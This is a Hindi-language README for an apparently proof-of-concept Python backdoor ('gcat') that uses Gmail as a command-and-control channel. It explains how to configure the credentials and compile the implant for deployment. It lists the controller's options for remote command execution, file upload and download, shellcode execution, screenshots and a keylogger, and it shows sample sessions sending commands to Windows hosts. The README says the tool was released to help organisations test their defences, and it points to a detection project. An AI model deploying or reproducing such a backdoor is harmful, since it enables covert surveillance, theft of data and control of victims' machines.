
एक PoC बैकडोर जो Gmail को C&C सर्वर के रूप में उपयोग करता है
एक गुप्त Python-आधारित बैकडोर जो Gmail को कमांड और कंट्रोल सर्वर के रूप में उपयोग करता है
यह प्रोजेक्ट Benjamin Donnelly के मूल PoC कोड से प्रेरित था
... जो संगठनों को इन प्रकार के हमलों के विरुद्ध अपनी सुरक्षा का परीक्षण करने के लिए जारी किया गया था। उन्हें पहचानने के लिए RITA जैसे प्रोजेक्ट देखें।
इस प्रोजेक्ट के अधिक अद्यतन और अनुरक्षित संस्करण के लिए GDog देखें
इसे काम करने के लिए आपको चाहिए:
इस रिपो में दो फ़ाइलें हैं:
gcat.py एक स्क्रिप्ट जो उपलब्ध क्लाइंट्स की गणना करने और उन्हें कमांड जारी करने के लिए उपयोग की जाती हैimplant.py वास्तविक बैकडोर जिसे तैनात करना हैदोनों फ़ाइलों में, gmail_user और gmail_pwd वेरिएबल्स को उस खाते के उपयोगकर्ता नाम और पासवर्ड से संपादित करें जिसे आपने पहले सेटअप किया था।
आप शायद Pyinstaller का उपयोग करके implant.py को एक एक्ज़ीक्यूटेबल में कंपाइल करना चाहेंगे।
नोट: implant.py को 32bit Python इंस्टॉलेशन के साथ कंपाइल करने की अनुशंसा की जाती है
dP
88
.d8888b. .d8888b. .d8888b. d8888P
88' `88 88' `"" 88' `88 88
88. .88 88. ... 88. .88 88
`8888P88 `88888P' `88888P8 dP
.88
d8888P
.__....._ _.....__,
.": o :': ;': o :".
`. `-' .'. .'. `-' .'
`---' `---'
_...----... ... ... ...----..._
.-'__..-''---- `. `"` .' ----'''-..__`-.
'.-' _.--''' `-._.-' ''''--._ `-.`
' .-"' : `"-. `
' `. _.'"'._ .' `
`. ,.-'" "'-., .'
`. .'
jgs `-._ _.-'
`"'--...___...--'"`
...IM IN YUR COMPUTERZ...
WATCHIN YUR SCREENZ
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-id ID Client to target
-jobid JOBID Job id to retrieve
-list List available clients
-info Retrieve info on specified client
Commands:
Commands to execute on an implant
-cmd CMD Execute a system command
-download PATH Download a file from a clients system
-upload SRC DST Upload a file to the clients system
-exec-shellcode FILE Execute supplied shellcode on a client
-screenshot Take a screenshot
-lock-screen Lock the clients screen
-force-checkin Force a check in
-start-keylogger Start keylogger
-stop-keylogger Stop keylogger
Meow!
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
आउटपुट एक UUID स्ट्रिंग है जो सिस्टम और उस OS को विशिष्ट रूप से पहचानती है जिस पर implant चल रहा है।
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
यहाँ हम 90b2cd83-cb36-52de-84ee-99db6ff41a11 को ipconfig /all निष्पादित करने के लिए कह रहे हैं, फिर स्क्रिप्ट jobid आउटपुट करती है जिसका उपयोग हम उस कमांड का आउटपुट प्राप्त करने के लिए कर सकते हैं।
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --